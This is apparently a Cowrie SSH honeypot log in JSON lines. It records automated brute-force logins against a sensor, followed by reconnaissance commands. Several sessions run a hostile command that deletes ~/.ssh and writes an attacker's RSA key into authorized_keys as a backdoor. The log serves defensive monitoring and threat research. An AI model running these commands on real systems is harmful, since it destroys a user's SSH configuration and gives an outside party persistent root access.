{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:41.796376Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.closed","duration":30.873173475265503,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:41.987731Z","src_ip":"212.227.125.160","session":"be475df35f74"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:43.344604Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T22:20:43.345546Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:43.596685Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:44.153593Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T22:20:44.154387Z","src_ip":"212.227.235.229","session":"5d46ec349dbd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40898,"dst_ip":"1.2.3.4","dst_port":22,"session":"ac331b302d0d","protocol":"ssh","message":"New connection: 212.227.235.229:40898 (1.2.3.4:22) [session: ac331b302d0d]","sensor":"my-vps","timestamp":"2025-09-08T22:20:44.185458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:44.186458Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:44.357294Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.login.success","username":"root","password":"mypassword@123","message":"login attempt [root/mypassword@123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:20:45.083571Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:45.444704Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:45.445374Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:45.446645Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:45.618616Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:46.066795Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:20:46.067496Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:20:46.240159Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:46.241045Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40904,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f5b00b6dcfb","protocol":"ssh","message":"New connection: 212.227.235.229:40904 (1.2.3.4:22) [session: 4f5b00b6dcfb]","sensor":"my-vps","timestamp":"2025-09-08T22:20:46.436133Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:46.437083Z","src_ip":"212.227.235.229","session":"4f5b00b6dcfb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:46.622139Z","src_ip":"212.227.235.229","session":"4f5b00b6dcfb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:20:47.364644Z","src_ip":"212.227.235.229","session":"4f5b00b6dcfb"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:48.553121Z","src_ip":"212.227.235.229","session":"4f5b00b6dcfb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40908,"dst_ip":"1.2.3.4","dst_port":22,"session":"975c673f5cc9","protocol":"ssh","message":"New connection: 212.227.235.229:40908 (1.2.3.4:22) [session: 975c673f5cc9]","sensor":"my-vps","timestamp":"2025-09-08T22:20:48.725007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:48.725774Z","src_ip":"212.227.235.229","session":"975c673f5cc9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:48.902831Z","src_ip":"212.227.235.229","session":"975c673f5cc9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:20:49.653427Z","src_ip":"212.227.235.229","session":"975c673f5cc9"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:49.825106Z","src_ip":"212.227.235.229","session":"ac331b302d0d"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:49.832059Z","src_ip":"212.227.235.229","session":"975c673f5cc9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47812,"dst_ip":"1.2.3.4","dst_port":22,"session":"26bf9786f888","protocol":"ssh","message":"New connection: 212.227.235.229:47812 (1.2.3.4:22) [session: 26bf9786f888]","sensor":"my-vps","timestamp":"2025-09-08T22:20:50.910125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:50.911390Z","src_ip":"212.227.235.229","session":"26bf9786f888"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:51.223204Z","src_ip":"212.227.235.229","session":"26bf9786f888"}
{"eventid":"cowrie.login.failed","username":"webtest","password":"webtest@123","message":"login attempt [webtest/webtest@123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:20:52.473872Z","src_ip":"212.227.235.229","session":"26bf9786f888"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:53.787876Z","src_ip":"212.227.235.229","session":"26bf9786f888"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52502,"dst_ip":"1.2.3.4","dst_port":22,"session":"22960b1620f2","protocol":"ssh","message":"New connection: 212.227.235.229:52502 (1.2.3.4:22) [session: 22960b1620f2]","sensor":"my-vps","timestamp":"2025-09-08T22:20:55.276232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:55.277233Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:55.585086Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53574,"dst_ip":"1.2.3.4","dst_port":22,"session":"c64d43e23951","protocol":"ssh","message":"New connection: 212.227.235.229:53574 (1.2.3.4:22) [session: c64d43e23951]","sensor":"my-vps","timestamp":"2025-09-08T22:20:55.773292Z"}
{"eventid":"cowrie.login.success","username":"root","password":"0.0.0.0.","message":"login attempt [root/0.0.0.0.] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:20:56.859343Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:57.500247Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:57.501083Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:20:57.502513Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:57.812758Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:20:58.538192Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:20:58.538975Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:20:58.849202Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:20:58.850230Z","src_ip":"212.227.235.229","session":"22960b1620f2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52516,"dst_ip":"1.2.3.4","dst_port":22,"session":"1caefc8341f1","protocol":"ssh","message":"New connection: 212.227.235.229:52516 (1.2.3.4:22) [session: 1caefc8341f1]","sensor":"my-vps","timestamp":"2025-09-08T22:20:59.158323Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:20:59.159147Z","src_ip":"212.227.235.229","session":"1caefc8341f1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:20:59.468450Z","src_ip":"212.227.235.229","session":"1caefc8341f1"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:21:00.749160Z","src_ip":"212.227.235.229","session":"1caefc8341f1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:21:01.782430Z","src_ip":"212.227.235.229","session":"c64d43e23951"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-